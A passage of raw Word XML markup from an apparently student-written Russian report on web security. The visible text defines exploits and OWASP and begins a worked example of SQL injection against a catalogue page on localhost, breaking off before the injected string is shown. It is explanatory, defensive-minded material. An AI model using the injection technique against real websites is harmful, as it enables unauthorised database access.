              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc420596251 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>32</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00EB5DBA" w:rsidRDefault="006012B7">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423C8F" w:rsidRDefault="00423C8F" w:rsidP="00D21A0A">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc420429529"/>
      <w:bookmarkStart w:id="1" w:name="_Toc420596235"/>
    </w:p>
    <w:p w:rsidR="00423C8F" w:rsidRDefault="00423C8F" w:rsidP="00423C8F"/>
    <w:p w:rsidR="00423C8F" w:rsidRDefault="00423C8F" w:rsidP="00423C8F"/>
    <w:p w:rsidR="00423C8F" w:rsidRDefault="00423C8F" w:rsidP="00423C8F">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D21A0A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Введение</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00423C8F" w:rsidRPr="00423C8F" w:rsidRDefault="00423C8F" w:rsidP="00423C8F"/>
    <w:bookmarkEnd w:id="0"/>
    <w:bookmarkEnd w:id="1"/>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sql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сервис-ориентированные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FC4D17"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6C445E" w:rsidRPr="006C445E" w:rsidRDefault="006C445E" w:rsidP="002C385A">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="351" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C445E">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Цели</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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Default="003A515D" w:rsidP="00301693">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A852C0" w:rsidRDefault="00A852C0" w:rsidP="00301693">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A852C0" w:rsidRDefault="00A852C0" w:rsidP="00A852C0">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc420596236"/>
      <w:r w:rsidRPr="00A852C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Sql-Инъекции</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w:rsidR="00A852C0" w:rsidRPr="00A455ED" w:rsidRDefault="004D6608" w:rsidP="00A455ED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A455ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ключевые слова</w:t>
      </w:r>
      <w:r w:rsidR="00A455ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D6608" w:rsidRPr="004D6608" w:rsidRDefault="004D6608" w:rsidP="004D6608">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D6608">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Эксплойт</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D6608">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> — программа, фрагмент программного кода или последовательность команд, использующие уязвимости в коде сайта или программном обеспечении сервера используемые для проведения атаки на сайт или сервер.</w:t>
      </w:r>
      <w:r w:rsidRPr="004D6608">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004D6608">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Целью атаки может быть как получение контроля над сайтом, так и нарушение его функционирования</w:t>
      </w:r>
      <w:r w:rsidRPr="004D6608">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D6608" w:rsidRPr="004D6608" w:rsidRDefault="004D6608" w:rsidP="004D6608">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D6608">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Open</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Web</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Application</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Security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Project</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D6608">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (OWASP) - это открытый проект обеспечения безопасности </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D6608">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>веб-приложений</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D6608">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Сообщество OWASP включает в себя корпорации, образовательные организации и частных лиц со всего мира. Сообщество работает над созданием статей, учебных пособий, документации, инструментов и технологий, находящихся в свободном доступе.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D6608" w:rsidRPr="004D6608" w:rsidRDefault="004D6608" w:rsidP="00A852C0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A852C0" w:rsidRPr="004D6608" w:rsidRDefault="00A852C0" w:rsidP="00A852C0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D6608">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">В сфере </w:t>
      </w:r>
      <w:r w:rsidR="004D6608" w:rsidRPr="004D6608">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>безопасности интернет технологий</w:t>
      </w:r>
      <w:r w:rsidRPr="004D6608">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> существует разновидность </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004D6608" w:rsidRPr="004D6608">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>эксплойтов</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D6608">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4D6608">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Top</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D6608">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4D6608">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Structured</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Query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Language</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D6608">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4D6608">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>веб-активов</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D6608">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A852C0" w:rsidRPr="003B32C2" w:rsidRDefault="00A852C0" w:rsidP="00A852C0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D6608">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Как правило, атаки с использованием SQL-инъекции весьма просты, поэтому удивительно</w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">,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A852C0" w:rsidRPr="00291342" w:rsidRDefault="003B7814" w:rsidP="00301693">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Пример из практики</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Пользователь отправляет за</w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>прос http://localhost:8080/</w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>catalog</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tables</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asp</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w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>120</w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> на</w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>сервер приложени</w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>я</w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. В качестве</w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> целочисленного параметра </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переда</w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ется значение 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B7814" w:rsidRPr="00291342" w:rsidRDefault="003B7814" w:rsidP="00291342">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Сервер</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приложений</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динами</w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>чески</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формирует</w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL-</w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>запрос</w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> SELECT</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lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">* FROM </w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tables</w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> WHERE </w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Price = 120</w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ORDER BY </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lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00291342"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Из таблицы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извлека</w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ю</w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">тся данные о товарах, цена которых равна 120 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>у.е</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00291342" w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и</w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> результат упорядочивается по </w:t>
      </w:r>
      <w:r w:rsidR="00291342" w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>цене</w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> товара. Данные переда</w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ются серверу приложений.</w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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lastRenderedPageBreak/>
        <w:t>Сервер приложений форми</w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>р</w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ует результат, который отобража</w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ется пользователю.</w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Если в качестве параметра пере</w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">дать строку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Pr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">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w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> то на сервер СУБД поступит SQL-</w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">запрос </w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> * </w:t>
